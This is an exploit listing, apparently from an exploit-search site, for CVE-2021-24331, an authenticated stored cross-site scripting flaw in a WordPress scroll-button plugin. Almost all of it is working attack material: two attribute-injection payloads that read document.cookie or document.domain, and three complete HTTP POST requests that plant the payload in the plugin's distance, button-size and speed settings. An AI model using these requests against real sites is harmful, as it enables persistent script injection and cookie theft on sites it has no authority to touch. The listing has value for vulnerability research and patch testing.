Exploit for Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSS CVE-2021-24331

## https://sploitus.com/exploit?id=WPEX-ID:2C7CA586-DEF8-4723-B779-09D7F37FA1AB
### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "

[$] " autofocus=autofocus onfocus=alert(document.domain); "



### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13



### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13



### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22